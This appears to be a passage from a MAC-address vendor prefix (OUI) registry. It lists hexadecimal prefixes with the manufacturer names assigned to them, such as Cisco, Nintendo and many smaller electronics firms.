001629 Nivus GmbH 001621 Colorado Vnet 00161A Dametric AB 001615 Nittan Company, Limited 001616 BROWAN COMMUNICATION INC. 001617 MSI 00162E Space Shuttle Hi-Tech Co., Ltd. 00162A Antik computers & communications s.r.o. 001656 Nintendo Co., Ltd. 001651 Exeo Systems 001610 Carina Technology 001606 Ideal Industries 001607 Curves International Inc. 001654 Flex-P Industries Sdn. Bhd. 001631 Xteam 00164B Quorion Data Systems GmbH 001594 BIXOLON CO.,LTD 001590 Hectronic GmbH 00158C Liab ApS 00158F NTT Advanced Technology Corporation 0015ED Fulcrum Microsystems, Inc. 0015F0 EGO BV 0015EE Omnex Control Systems 0015C8 FlexiPanel Ltd 0015C0 DIGITAL TELEMEDIA CO.,LTD. 0015C2 3M Germany 001588 Salutica Allied Solutions Sdn Bhd 001583 IVT corporation 001585 Aonvision Technolopy Corp. 0015A5 DCI Co., Ltd. 0015B2 Advanced Industrial Computer, Inc. 0015DA IRITEL A.D. 00154A WANSHIH ELECTRONIC CO., LTD 00154C Saunders Electronics 00154D Netronome Systems, Inc. 001549 Dixtal Biomedica Ind. Com. Ltda 00153D ELIM PRODUCT CO. 001544 coM.s.a.t. AG 001539 Technodrive srl 001531 KOCOM 001535 OTE Spa 001536 Powertech co.,Ltd 00152B Cisco Systems, Inc 00152C Cisco Systems, Inc 001528 Beacon Medical Products LLC d.b.a. BeaconMedaes 001527 Balboa Instruments 001521 Horoquartz 001520 Radiocrafts AS 001566 A-First Technology Co., Ltd. 00156B Perfisans Networks Corp. 001547 AiZen Solutions Inc. 001579 Lunatone Industrielle Elektronik GmbH 0014D7 Datastore Technology Corp 0014DD Covergence Inc. 0014D4 K Technology Corporation 0014CF INVISIO Communications 0014BE Wink communication technology CO.LTD 001511 Data Center Systems 00150E OPENBRAIN TECHNOLOGIES CO., LTD. 00150D Hoana Medical, Inc. 00151C LENECO 001519 StoreAge Networking Technologies 001506 Neo Photonics 001504 GAME PLUS CO., LTD. 001505 Actiontec Electronics, Inc 0014FE Artech Electronics 0014DE Sage Instruments Inc. 0014DF HI-P Tech Corporation 0014E6 AIM Infrarotmodule GmbH 0014F3 ViXS Systems Inc 00147E InnerWireless 00147D Aeon Digital International 001476 MultiCom Industries Limited 001473 Bookham Inc 001489 B15402100 - JANDEI, S.L. 001480 Hitachi-LG Data Storage Korea, Inc 0014B6 Enswer Technology Inc. 0014B2 mCubelogics Corporation 0014AE Wizlogics Co., Ltd. 0014A6 Teranetics, Inc. 001469 Cisco Systems, Inc 0014BA Carvers SA de CV 00148A Elin Ebg Traction Gmbh 001491 Daniels Electronics Ltd. dbo Codan Rado Communications 00146E H. Stoll GmbH & Co. KG 0014AA Ashly Audio, Inc. 001409 MAGNETI MARELLI S.E. S.p.A. 00140B FIRST INTERNATIONAL COMPUTER, INC. 0013FD Nokia Danmark A/S 001400 MINERVA KOREA CO., LTD 0013FC SiCortex, Inc 0013F6 Cintech 00144F Oracle Corporation 001456 Edge Products 001450 Heim Systems GmbH 001452 CALCULEX,INC. 001442 ATTO CORPORATION 001447 BOAZ Inc. 00143E AirLink Communications, Inc. 00145D WJ Communications, Inc. 00143B Sensovation AG 00142D Toradex AG 001429 V Center Technologies Co., Ltd. 001414 Jumpnode Systems LLC. 00141E P.A. Semi, Inc. 0013CB Zenitel Norway AS 0013CF 4Access Communications 0013BE Virtual Conexions 0013B9 BM SPA 0013AB Telemotive AG 0013C9 Beyond Achieve Enterprises Ltd. 0013C6 OpenGear, Inc 0013F3 Giga-byte Communications Inc. 0013F4 Psitek (Pty) Ltd 0013AC Sunmyung Electronics Co., LTD 0013A8 Tanisys Technology 0013DA Diskware Co., Ltd 0013D8 Princeton Instruments 001399 STAC Corporation. 0013E9 VeriWave, Inc. 001395 congatec AG 001356 FLIR Radiation Inc 00135A Project T&E Limited 001361 Biospace Co., Ltd. 001362 ShinHeung Precision Co., Ltd. 00134F Rapidus Wireless Networks Inc. 001378 Qsan Technology, Inc. 00137A Netvox Technology Co., Ltd. 001381 CHIPS & Systems, Inc. 001379 PONDER INFORMATION INDUSTRIES LTD. 00132C MAZ Brandenburg GmbH 001324 Schneider Electric Ultra Terminal 001326 ECM Systems Ltd 001327 Data Acquisitions limited 001367 Narayon. Co., Ltd. 00135C OnSite Systems, Inc. 00135F Cisco Systems, Inc 00133B Speed Dragon Multimedia Limited 001338 FRESENIUS-VIAL 00132D iWise Communications 001374 Atheros Communications, Inc. 001369 Honda Electron Co., LED. 001342 Vision Research, Inc. 001340 AD.EL s.r.l. 00130C HF System Corporation 00130F EGEMEN Bilgisayar Muh San ve Tic LTD STI 001313 GuangZhou Post & Telecom Equipment ltd 0012CB CSS Inc. 0012CE Advanced Cybernetics Group 0012CA Mechatronic Brick Aps 0012C7 SECURAY Technologies Ltd.Co. 0012CD ASEM SpA 0012E8 Fraunhofer IMS 0012DD Shengqu Information Technology (Shanghai) Co., Ltd. 00131D Scanvaegt International A/S 001318 DGSTATION Co., Ltd. 00131A Cisco Systems, Inc 0012F4 Belco International Co.,Ltd. 0012F5 Imarda New Zealand Limited 0012E0 Codan Limited 0012DE Radio Components Sweden AB 001301 IronGate S.L. 0012F6 MDK CO.,LTD. 0012F1 IFOTEC 0012F8 WNI Resources, LLC 00127C SWEGON AB 001278 International Bar Code 00127A Sanyu Industry Co.,Ltd. 001268 IPS d.o.o. 0012AC ONTIMETEK INC. 0012BC Echolab LLC 0012BD Avantec Manufacturing Limited 0012AB WiLife, Inc. 00129B E2S Electronic Engineering Solutions, S.L. 001298 MICO ELECTRIC(SHENZHEN) LIMITED 001272 Redux Communications Ltd. 00126A OPTOELECTRONICS Co., Ltd. 0012C0 HotLava Systems, Inc. 0012B7 PTW Freiburg 0012A1 BluePacket Communications Co., Ltd. 001206 iQuest (NZ) Ltd 001207 Head Strong International Limited 001209 Fastrax Ltd 00120B Chinasys Technologies Limited 001205 Terrasat Communications, Inc. 001238 SetaBox Technology Co., Ltd. 00123C Second Rule LLC 00123E ERUNE technology Co., Ltd. 001254 Spectra Technologies Holdings Company Ltd 00124F nVent 001221 B.Braun Melsungen AG 001212 PLUSCorporation 001213 Metrohm AG 001218 ARUZE Corporation 001249 Delta Elettronica S.p.A. 00124D Inducon BV 001266 Swisscom Hospitality Services SA 00125E CAEN 00125D CyberNet Inc. 001223 Pixim 00123A Posystech Inc., Co. 001234 Camille Bauer 0011E3 Thomson, Inc. 0011DC Glunz & Jensen 001196 Actuality Systems, Inc. 001187 Category Solutions, Inc 001190 Digital Design Corporation 0011C4 Terminales de Telecomunicacion Terrestre, S.L. 0011CB Jacobsons AB 0011F7 Shenzhen Forward Industry Co., Ltd 0011D3 NextGenTel Holding ASA 0011AB TRUSTABLE TECHNOLOGY CO.,LTD. 0011A5 Fortuna Electronic Corp. 00113C Micronas GmbH 001131 UNATECH. CO.,LTD 001127 TASI, Inc 00112A Niko NV 00112B NetModule AG 00116F Netforyou Co., LTD. 001171 DEXTER Communications, Inc. 001167 Integrated System Solution Corp. 00116D American Time and Signal 001160 ARTDIO Company Co., LTD 001154 Webpro Technologies Inc. 001145 ValuePoint Networks 001151 Mykotronx 00114E 690885 Ontario Inc. 00112D iPulse Systems 00117B BüchiLabortechnik AG 000FEE XTec, Incorporated 000FE4 Pantech Co.,Ltd 000FE7 Lutron Electronics Co., Inc. 000FE6 MBTech Systems, Inc. 000FDA YAZAKI CORPORATION 000FEF Thales e-Transactions GmbH 000FE9 GW TECHNOLOGIES CO.,LTD. 000FE1 ID DIGITAL CORPORATION 000FDF SOLOMON Technology Corp. 000FFE G-PRO COMPUTER 00110B Franklin Technology Systems 001105 Sunplus Technology Co., Ltd. 001102 Aurora Multimedia Corp. 001123 Appointech, Inc. 00110F netplat,Inc. 000FD6 Sarotech Co., Ltd 001115 EPIN Technologies, Inc. 000FC7 Dionica R&D Ltd. 000F64 D&R Electronica Weesp BV 000F75 First Silicon Solutions 000F7C ACTi Corporation 000F7A BeiJing NuQX Technology CO.,LTD 000FAD FMN communications GmbH 000FAB Kyushu Electronics Systems Inc. 000FAC IEEE 802.11 000F72 Sandburst 000FB3 Actiontec Electronics, Inc 000F9C Panduit Corp 000FC8 Chantry Networks 000FBB Nokia Siemens Networks GmbH & Co. KG. 000FBC Onkey Technologies, Inc. 000FB6 Europlex Technologies 000FB9 Adaptive Instruments 000F98 Avamax Co. Ltd. 000F97 Avanex Corporation 000F96 Telco Systems, Inc. 000F8B Orion MultiSystems Inc 000F8C Gigawavetech Pte Ltd 000F38 Netstar 000F3A HISHARP 000F30 Raza Microelectronics Inc 000F53 Solarflare Communications Inc. 000F51 Azul Systems, Inc. 000F07 Mangrove Systems, Inc. 000F00 Legra Systems, Inc. 000F01 DIGITALKS INC 000F03 COM&C CO., LTD 000F34 Cisco Systems, Inc 000F2E Megapower International Corp. 000F26 WorldAccxxLLC 000F45 Stretch, Inc. 000F3B Fuji System Machines Co., Ltd. 000F37 Xambala Incorporated 000F54 Entrelogic Corporation 000F25 AimValley B.V. 000F19 Boston Scientific 000F10 RDM Corporation 000EA8 United Technologists Europe Limited 000EAA Scalent Systems, Inc. 000EAC MINTRON ENTERPRISE CO., LTD. 000EAE GAWELL TECHNOLOGIES CORP. 000EBA HANMI SEMICONDUCTOR CO., LTD. 000EBC Paragon Fidelity GmbH 000EC5 Digital Multitools Inc 000EC7 Motorola Korea 000E8B Astarte Technology Co, Ltd. 000EDF PLX Technology 000EE1 ExtremeSpeed Inc. 000ED7 Cisco Systems, Inc 000ED3 Epicenter, Inc. 000E9D Tiscali UK Ltd 000E47 NCI System Co.,Ltd. 000E46 Niigata Seimitsu Co.,Ltd. 000E1F TCL Networks Equipment Co., Ltd. 000E26 Gincom Technology Corp. 000E6C Device Drivers Limited 000E6B Janitza electronics GmbH 000E5F activ-net GmbH & Co. KG 000E57 Iworld Networking, Inc. 000E51 tecna elettronica srl 000E67 Eltis Microelectronics Ltd. 000E65 TransCore 000E43 G-Tek Electronics Sdn. Bhd. 000E44 Digital 5, Inc. 000E74 Solar Telecom. Tech 000E7A GemWon Communications Co., Ltd. 000E80 Thomson Technology Inc 000E85 Catalyst Enterprises, Inc. 000E32 Kontron Medical 000E0B Netac Technology Co., Ltd. 000E11 BDT Büro und Datentechnik GmbH & Co.KG 000DF5 Teletronics International Inc. 000DF7 Space Dynamics Lab 000DEB CompXs Limited 000DEE Andrew RF Power Amplifier Group 000DEF Soc. Coop. Bilanciai 000DE7 Snap-on OEM Group 000DC6 DigiRose Technology Co., Ltd. 000DC1 SafeWeb Inc 000DF0 QCOM TECHNOLOGY INC. 000DE5 Samsung Thales 000DC0 Spagat AS 000DDD Profilo Telra Elektronik Sanayi ve Ticaret. A.Åž 000DF8 ORGA Kartensysteme GmbH 000E16 SouthWing S.L. 000DA7 Private 000DAD Dataprobe, Inc. 000DA9 T.E.A.M. S.L. 000DAB Parker Hannifin GmbH Electromechanical Division Europe 000DA8 Teletronics Technology Corporation 000D79 Dynamic Solutions Co,.Ltd. 000D6D K-Tech Devices Corp. 000DAF Plexus Corp (UK) Ltd 000DB1 Japan Network Service Co., Ltd. 000D83 Sanmina-SCI HungaryLtd. 000D7F MIDASCOMMUNICATION TECHNOLOGIES PTE LTD ( Foreign Branch) 000D75 Kobian Pte Ltd - Taiwan Branch 000D78 Engineering & Security 000D9E TOKUDEN OHIZUMI SEISAKUSYO Co.,Ltd. 000DA3 Emerging Technologies Limited 000DA4 DOSCH & AMAND SYSTEMS AG 000D9A INFOTEC LTD 000D6E K-Patents Oy 000D6A Redwood Technologies LTD 000DBA Océ Document Technologies GmbH 000DBD Cisco Systems, Inc 000DB5 GLOBALSAT TECHNOLOGY CORPORATION 000D97 ABB Inc./Tropos 000D96 Vtera Technology Inc. 000D8B T&D Corporation 000D90 Factum Electronics AB 000D85 Tapwave, Inc. 000D82 PHSNET 000D23 Smart Solution, Inc 000D27 MICROPLEX Printware AG 000D1B Kyoto Electronics Manufacturing Co., Ltd. 000D1D HIGH-TEK HARNESS ENT. CO., LTD. 000D02 NEC Platforms, Ltd. 000D07 Calrec Audio Ltd 000D40 Verint Loronix Video Solutions 000D21 WISCORE Inc. 000D09 Yuehua(Zhuhai) Electronic CO. LTD 000D37 WIPLUG 000D33 Prediwave Corp. 000D2F AIN Comm.Tech.Co., LTD 000D5D Raritan Computer, Inc 000D63 DENT Instruments, Inc. 000D66 Cisco Systems, Inc 000CCD IEC - TC57 000CCB Design Combus Ltd 000CC9 ILWOO DATA & TECHNOLOGY CO.,LTD 000CE9 BLOOMBERG L.P. 000CEA aphona Kommunikationssysteme 000CDA FreeHand Systems, Inc. 000CF5 InfoExpress 000CEE jp-embedded 000CAF TRI TERM CO.,LTD. 000CB3 ROUND Co.,Ltd. 000CDD AOS technologies AG 000CA5 Naman NZ LTd 000CA9 Ebtron Inc. 000CFB Korea Network Systems 000C7A DaTARIUS Technologies GmbH 000C79 Extel Communications P/L 000C75 Oriental integrated electronics. LTD 000C5D CHIC TECHNOLOGY (CHINA) CORP. 000C4F UDTech Japan Corporation 000C62 ABB AB, Cewe-Control 000C4C Arcor AG&Co. 000C47 SK Teletech(R&D Planning Team) 000C6D Edwards Ltd. 000C70 ACC GmbH 000C6A MBARI 000C6B Kurz Industrie-Elektronik GmbH 000C9D UbeeAirWalk, Inc. 000C9F NKE Corporation 000C84 Eazix, Inc. 000C85 Cisco Systems, Inc 000C3F Cogent Defence & Security Networks, 000C30 Cisco Systems, Inc 000C9A Hitech Electronics Corp. 000C91 Riverhead Networks Inc. 000BDA EyeCross Co.,Inc. 000BD6 Paxton Access Ltd 000BD4 Beijing Wise Technology & Science Development Co.Ltd 000C1F Glimmerglass Networks 000C20 Fi WIn, Inc. 000C15 CyberPower Systems, Inc. 000BF8 Infinera 000BFF Berkeley Camera Engineering 000C16 Concorde Microsystems Inc. 000C09 Hitachi IE Systems Co., Ltd 000BE7 COMFLUX TECHNOLOGY INC. 000BEC NIPPON ELECTRIC INSTRUMENT, INC. 000C02 ABB Oy 000B71 Litchfield Communications Inc. 000B74 Kingwave Technology Co., Ltd. 000B73 Kodeos Communications 000B76 ET&T Technology Co. Ltd. 000B5E Audio Engineering Society Inc. 000B60 Cisco Systems, Inc 000B65 Sy.A.C. srl 000B5F Cisco Systems, Inc 000B61 Friedrich Lütze GmbH & Co. KG 000B59 ScriptPro, LLC 000B5C Newtech Co.,Ltd 000B7E SAGINOMIYA Seisakusho Inc. 000B80 Lycium Networks 000BA7 Maranti Networks 000BAA Aiphone co.,Ltd 000BA4 Shiron Satellite Communications Ltd. (1996) 000BD0 XiMeta Technology Americas Inc. 000BC5 SMC Networks, Inc. 000BC6 ISAC, Inc. 000BC1 Bay Microsystems, Inc. 000B8B KERAJET, S.A. 000B89 Top Global Technology, Ltd. 000B99 SensAble Technologies, Inc. 000B9C TriBeam Technologies, Inc. 000B7C Telex Communications 000B83 DATAWATT B.V. 000B20 Hirata corporation 000B22 Environmental Systems and Services 000B1B Systronix, Inc. 000B03 Taekwang Industrial Co., Ltd 000B01 DAIICHI ELECTRONICS CO., LTD. 000B3E BittWare, Inc 000B29 LS(LG) Industrial Systems co.,Ltd 000B39 Keisoku Giken Co.,Ltd. 000B3A QuStream Corporation 000B33 Vivato Technologies 000B05 Pacific Broadband Networks 000B00 FUJIAN START COMPUTER EQUIPMENT CO.,LTD 000B5B Rincon Research Corporation 000AF6 Emerson Climate Technologies Retail Solutions, Inc. 000B11 HIMEJI ABC TRADING CO.,LTD. 000B41 Ing. Büro Dr. Beutlhauser 000AEA ADAM ELEKTRONIK LTD. ÅžTI 000AE3 YANG MEI TECHNOLOGY CO., LTD 000ADC RuggedCom Inc. 000AB7 Cisco Systems, Inc 000AAD Stargames Corporation 000AB1 GENETEC Corporation 000AB9 Astera Technologies Corp. 000A90 Bayside Interactive, Inc. 000A9D King Young Technology Co. Ltd. 000AA1 V V S Limited 000AA4 SHANGHAI SURVEILLANCE TECHNOLOGY CO,LTD 000A9E BroadWeb Corportation 000AE0 Fujitsu Softek 000A8B Cisco Systems, Inc 000A88 InCypher S.A. 000ABB Taiwan Secom Co,. Ltd 000A7C Tecton Ltd 000A6E Harmonic, Inc 000A6D EKS Elektronikservice GmbH 000A43 Chunghwa Telecom Co., Ltd. 000A45 Audio-Technica Corp. 000A35 Xilinx 000A3B GCT Semiconductor, Inc 000A74 Manticom Networks Inc. 000A6F ZyFLEX Technologies Inc 000A63 DHD GmbH 000A2E MAPLE NETWORKS CO., LTD 000A2D Cabot Communications Limited 000A25 CERAGON NETWORKS 000A21 Integra Telecom Co. Ltd 000A1E Red-M Products Limited 000A4B DataPower Technology, Inc. 000A33 Emulex Corporation 000A67 OngCorp 0009F9 ART JAPAN CO., LTD. 0009FC IPFLEX Inc. 0009FD Ubinetics Limited 0009F7 SED, a division of Calian 0009E2 Sinbon Electronics Co., Ltd. 0009DA Control Module Inc. 0009D7 DC Security Products 0009D8 Fält Communications AB 000A14 TECO a.s. 000A0B Sealevel Systems, Inc. 000A10 FAST media integrations AG 0009DB eSpace 0009D5 Signal Communication, Inc. 0009D3 Western DataCom Co., Inc. 0009BC Utility, Inc 0009BE Mamiya-OP Co.,Ltd. 0009E6 Cyber Switching Inc. 0009FB Philips Patient Monitoring 00098F Cetacean Networks 000987 NISHI NIPPON ELECTRIC WIRE & CABLE CO.,LTD. 000989 VividLogic Inc. 000986 Metalink LTD. 00098C Option Wireless Sweden 000985 Auto Telecom Company 00098D Velocity Semiconductor 000981 Newport Networks 000955 Young Generation International Corp. 00094A Homenet Communications 00094B FillFactory NV 00094D Braintree Communications Pty Ltd 000950 Independent Storage Corporation 000954 AMiT spol. s. r. o. 000992 InterEpoch Technology,INC. 000995 Castle Technology Ltd 000998 Capinfo Company Limited 0009B6 Cisco Systems, Inc 0009B3 MCM Systems Ltd 00095C Philips Medical Systems - Cardiac and Monitoring Systems (CM 000958 INTELNET S.A. 0009A3 Leadfly Techologies Corp. Ltd. 0009A5 HANSUNG ELETRONIC INDUSTRIES DEVELOPMENT CO., LTD 000962 Sonitor Technologies AS 00095D Dialogue Technology Corp. 00099A ELMO COMPANY, LIMITED 00099C Naval Research Laboratory 000984 MyCasa Network Inc. 00092B iQstor Networks, Inc. 000926 YODA COMMUNICATIONS, INC. 000927 TOYOKEIKI CO.,LTD. 000923 Heaman System Co., Ltd 00091D Proteam Computer Corporation 0008EB ROMWin Co.,Ltd. 0008E8 Excel Master Ltd. 0008DC Wiznet 0008DD Telena Communications, Inc. 0008E1 Barix AG 000909 Telenor Connect A/S 00090A SnedFar Technology Co., Ltd. 00090F Fortinet Inc. 00092C Hitpoint Inc. 000903 Panasas, Inc 000907 Chrysalis Development 000906 Esteem Networks 000952 Auerswald GmbH & Co. KG 000944 Cisco Systems, Inc 0008FB SonoSite, Inc. 0008EE Logic Product Development 000917 WEM Technology Inc 000881 DIGITAL HANDS CO.,LTD. 000882 SIGMA CORPORATION 000873 DapTechnology B.V. 00087A Wipotec GmbH 000871 NORTHDATA Co., Ltd. 0008B2 SHENZHEN COMPASS TECHNOLOGY DEVELOPMENT CO.,LTD 0008B1 ProQuent Systems 0008AF Novatec Corporation 0008A6 Multiware & Image Co., Ltd. 00087E Bon Electro-Telecom Inc. 000880 BroadTel Canada Communications inc. 00086D Missouri FreeNet 0008D4 IneoQuest Technologies, Inc 0008D6 HASSNET Inc. 0008CE IPMobileNet Inc. 0008C2 Cisco Systems, Inc 0008C0 ASA SYSTEMS 0008A3 Cisco Systems, Inc 00089E Beijing Enter-Net co.LTD 0008B4 SYSPOL 0008B3 Fastwel 00088E Nihon Computer Co., Ltd. 0008DA SofaWare Technologies Ltd. 0007D5 3e Technologies Int;., Inc. 0007DB Kirana Networks, Inc. 00086A Securiton Gmbh 000863 Entrisphere Inc. 000866 DSX Access Systems, Inc. 0007EF Lockheed Martin Tactical Systems 0007F4 Eletex Co., Ltd. 0007DD Cradle Technologies 00081B Windigo Systems 0007FF Gluon Networks 0007F7 Galtronics 00085F Picanol N.V. 000852 Davolink Co. Inc. 00080C VDA Elettronica spa 000804 ICA Inc. 000857 Polaris Networks, Inc. 00078B Wegener Communications, Inc. 000783 SynCom Network, Inc. 000787 Idea System Co., Ltd. 000789 Allradio Co., Ltd 0007B9 Ginganet Corporation 00047F Chr. Mayr GmbH & Co. KG 00047B Schlumberger 0007B4 Cisco Systems, Inc 0007B3 Cisco Systems, Inc 0007B5 Any One Wireless Ltd. 000785 Cisco Systems, Inc 000775 Valence Semiconductor, Inc. 000793 Shin Satellite Public Company Limited 000796 LSI Systems, Inc. 00077F J Communications Co., Ltd. 000771 Embedded System Corporation 000770 Ubiquoss Inc 0007D1 Spectrum Signal Processing Inc. 0007A2 Opteon Corporation 0006F8 The Boeing Company 0006FB Hitachi Printing Solutions, Ltd. 0006FC Fnet Co., Ltd. 0006F4 Prime Electronics & Satellitics Inc. 000738 Young Technology Co., Ltd. 000729 Kistler Instrumente AG 00072A Innovance Networks 00074A Carl Valentin GmbH 00073C Telecom Design 000736 Data Video Technologies Co., Ltd. 000750 Cisco Systems, Inc 000742 Ormazabal 00074B Daihen Corporation 000764 YoungWoo Telecom Co. Ltd. 000766 Chou Chin Industrial Co., Ltd. 000761 29530 000755 Lafon 000759 Boris Manufacturing Corp. 000751 m-u-t AG 000719 Mobiis Co., Ltd. 00070D Cisco Systems, Inc 00070E Cisco Systems, Inc 00070B Novabase SGPS, SA 000710 Adax, Inc. 0006E8 Optical Network Testing, Inc. 0006EE Shenyang Neu-era Information & Technology Stock Co., Ltd 0006E2 Ceemax Technology Co., Ltd. 0006A5 PINON Corp. 00069D Petards Ltd 0006A8 KC Technology, Inc. 0006A0 Mx Imaging 0006BE Baumer Optronic GmbH 0006BA Westwave Communications 0006C4 Piolink Inc. 0006B5 Source Photonics, Inc. 00068F Telemonitor, Inc. 0006DA ITRAN Communications Ltd. 0006D0 Elgar Electronics Corp. 0006CC JMI Electronics Co., Ltd. 0006BF Accella Technologies Co., Ltd. 000690 Euracom Communication GmbH 0006E1 Techno Trade s.a 00062E Aristos Logic Corp. 000624 Gentner Communications Corp. 000625 The Linksys Group, Inc. 000627 Uniwide Technologies, Inc. 00062A Cisco Systems, Inc 00062C Bivio Networks 000621 Hinox, Co., Ltd. 00064E Broad Net Technology Inc. 00062D TouchStar Technologies, L.L.C. 000646 ShenZhen XunBao Network Technology Co Ltd 00064B Alexon Co., Ltd. 00063C Intrinsyc Software International Inc. 000630 Adtranz Sweden 000637 Toptrend-Meta Information (ShenZhen) Inc. 00061C Hoshino Metal Industries, Ltd. 000623 MGE UPS Systems France 00060B Artesyn Embedded Technologies 00067E WinCom Systems, Inc. 000677 SICK AG 000666 Roving Networks 000667 Tripp Lite 00064D Sencore 000660 NADEX Co., Ltd. 000679 Konami Corporation 00066C Robinson Corporation 000615 Kimoto Electric Co., Ltd. 00060A Blue2space 0005CE Prolink Microsystems Corporation 0005C2 Soronti, Inc. 0005DF Electronic Innovation, Inc. 0005DE Gi Fone Korea, Inc. 0005E0 Empirix Corp. 0005D8 Arescom, Inc. 0005E4 Red Lion Controls Inc. 0005F2 Power R, Inc. 0005F3 Webyn 000601 Otanikeiki Co., Ltd. 000605 Inncom International, Inc. 0005FA IPOptical, Inc. 0005E5 Renishaw PLC 0005F5 Geospace Technologies 0005FD PacketLight Networks Ltd. 0005D4 FutureSmart Networks, Inc. 0005C4 Telect, Inc. 0005A3 QEI, Inc. 00059E Zinwell Corporation 0005A5 KOTT 0005B3 Asahi-Engineering Co., Ltd. 00059D Daniel Computing Systems, Inc. 0005A4 Lucid Voice Ltd. 000563 J-Works, Inc. 000557 Agile TV Corporation 00055B Charles Industries, Ltd. 000554 Rangestar Wireless 000553 DVC Company, Inc. 000566 Secui.com Corporation 00056C Hung Chang Co., Ltd. 00055F Cisco Systems, Inc 00055D D-LINK SYSTEMS, INC. 000561 nac Image Technology, Inc. 000594 HMS Industrial Networks 00056F Innomedia Technologies Pvt. Ltd. 000574 Cisco Systems, Inc 000567 Etymonic Design, Inc. 000565 Tailyn Communication Company Ltd. 00058E Flextronics International GmbH & Co. Nfg. KG 000532 Cisco Systems, Inc 000536 Danam Communications, Inc. 000542 Otari, Inc. 000537 Nets Technology Co., Ltd. 00057C RCO Security AB 000583 ImageCom Limited 00054B Eaton Automation AG 0004C8 LIBA Maschinenfabrik GmbH 0004CC Peek Traffic B.V. 0004BF VersaLogic Corp. 0004C3 CASTOR Informatique 0004F6 Amphus 0004F4 Infinite Electronics Inc. 0004F1 WhereNet 000521 Control Microsystems 000523 AVL List GmbH 00051F Taijin Media Co., Ltd. 00050C Network Photonics, Inc. 0004EC Memobox SA 0004E4 Daeryung Ind., Inc. 00050A ICS Spa 000511 Complementary Technologies Ltd 000506 Reddo Networks AB 0004E2 SMC Networks, Inc. 0004CB Tdsoft Communication, Ltd. 000526 IPAS GmbH 000467 Wuhan Research Institute of MII 00045A The Linksys Group, Inc. 000463 Bosch Security Systems 00045C Mobiwave Pte Ltd 000453 YottaYotta, Inc. 000450 DMD Computers SRL 000443 Agilent Technologies, Inc. 000449 Mapletree Networks 00042F International Communications Products, Inc. 000429 Pixord Corporation 000426 Autosys 0004B8 Kumahira Co., Ltd. 0004B5 Equitrac Corporation 0004B1 Signal Technology, Inc. 000451 Medrad, Inc. 000483 Deltron Technology, Inc. 000441 Half Dome Systems, Inc. 0004A5 Barco Projection Systems NV 000482 Medialogic Corp. 0003CA MTS Systems Corp. 0003C7 hopf Elektronik GmbH 0003C2 Solphone K.K. 0003F3 Dazzle Multimedia, Inc. 0003EC ICG Research, Inc. 0003E9 Akara Canada, Inc. 0003E5 Hermstedt SG 000421 Ocular Networks 000424 TMC s.r.l. 00041D Corega of America 00041A Ines Test and Measurement GmbH & CoKG 00041E Shikoku Instrumentation Co., Ltd. 000413 snom technology GmbH 0003B4 Macrotek International Corp. 0003A6 Traxit Technology, Inc. 0003A4 Imation Corp. 0003AB Bridge Information Systems 000403 Nexsi Corporation 000406 Fa. Metabox AG 0003F8 SanCastle Technologies, Inc. 0003FA TiMetra Networks 0003C6 ICUE Systems, Inc. 0003BB Signal Communications Limited 0003BE Netility 0003DF Desana Systems 0003DA Takamisawa Cybernetics Co., Ltd. 0003D9 Secheron SA 0003FB ENEGATE Co.,Ltd. 0003F6 Allegro Networks, Inc. 000415 Rasteme Systems Co., Ltd. 000398 WISI 000395 California Amplifier 000392 Hyundai Teletek Co., Ltd. 00038E Atoga Systems, Inc. 00031A Beijing Broad Telecom Ltd., China 00035B BridgeWave Communications 000357 Intervoice-Brite, Inc. 00037F Atheros Communications, Inc. 0002F0 AME Optimedia Technology Co., Ltd. 00039E Tera System Co., Ltd. 000397 FireBrick Limited 00033F BigBand Networks, Ltd. 000327 ACT'L 00032E Scope Information Management, Ltd. 00037C Coax Media 000368 Embedone Co., Ltd. 000345 Routrek Networks Corporation 0002C8 Technocom Communications Technology (pte) Ltd 0002B8 WHI KONSULT AB 0002A9 RACOM, s.r.o. 0002BB Continuous Computing Corp 0002BC LVL 7 Systems, Inc. 00030F Digital China (Shanghai) Networks Ltd. 000311 Micro Technology Co., Ltd. 00030D Uniwill Computer Corp. 000309 Texcel Technology PLC 000303 JAMA Electronics Co., Ltd. 000305 MSC Vertriebs GmbH 0002FE Viditec, Inc. 00019F ReadyNet 0002FF Handan BroadInfoCom 0002F4 PCTEL, Inc. 0002E9 CS Systemes De Securite - C3S 0002E5 Timeware Ltd. 0002E0 ETAS GmbH 0002CE FoxJet, Inc. 0002C3 Arelnet Ltd. 000316 Nobell Communications, Inc. 000329 F3, Inc. 000321 Reco Research Co., Ltd. 0002F5 VIVE Synergies, Inc. 0002D5 ACR 0002AB CTC Union Technologies Co., Ltd. 0002A4 AddPac Technology Co., Ltd. 0002A3 ABB Switzerland Ltd, Power Systems 0002A0 Flatstack Ltd. 0002B2 Cablevision 0002B7 Watanabe Electric Industry Co., Ltd. 0002AF TeleCruz Technology, Inc. 0002A8 Air Link Technology 00026A Cocess Telecom Co., Ltd. 00026C Philips CFT 000262 Soyo Group Soyo Com Tech Co., Ltd 000265 Virditech Co. Ltd. 00025B Cambridge Silicon Radio 000256 Alpha Processor, Inc. 000259 Tsann Kuen China (Shanghai)Enterprise Co., Ltd. IT Group 000294 Tokyo Sokushin Co., Ltd. 000296 Lectron Co,. Ltd. 00028E Rapid 5 Networks, Inc. 00024F IPM Datacom S.R.L. 000271 Zhone Technologies 00028A Ambit Microsystems Corporation 0001FA HOROSCAS 000282 ViaClix, Inc. 000285 Riverstone Networks 000279 Control Applications, Ltd. 000251 Soma Networks, Inc. 0001F5 ERIM S.A. 0001FF Data Direct Networks, Inc. 0001FC Keyence Corporation 0001FD Digital Voice Systems, Inc. 000210 Fenecom 00020B Native Networks, Inc. 000218 Advanced Scientific Corp 0001EE Comtrol Europe, Ltd. 0001F0 Tridium, Inc. 0001F1 Innovative Concepts, Inc. 0001E2 Ando Electric Corporation 00022F P-Cube, Ltd. 000227 ESD Electronic System Design GmbH 00021D Data General Communication Ltd. 000219 Paralon Technologies 000203 Woonsang Telecom, Inc. 0001D3 PAXCOMM, Inc. 0001E1 Kinpo Electronics, Inc. 00022C ABB Bomem, Inc. 00023C Creative Technology, Ltd. 00306C Hitex Holding GmbH 00308B Brix Networks 000177 EDSL 00014D Shin Kin Enterprises Co., Ltd 0001DA WINCOMM Corporation 0001D2 inXtron, Inc. 0001C6 Quarry Technologies 00016E Conklin Corporation 000174 CyberOptics Corporation 00015E BEST TECHNOLOGY CO., LTD. 000161 Meta Machine Technology 0001A1 Mag-Tek, Inc. 000186 Uwe Disch 0001A6 Scientific-Atlanta Arcodan A/S 000172 TechnoLand Co., LTD. 0001A0 Infinilink Corporation 000196 Cisco Systems, Inc 000199 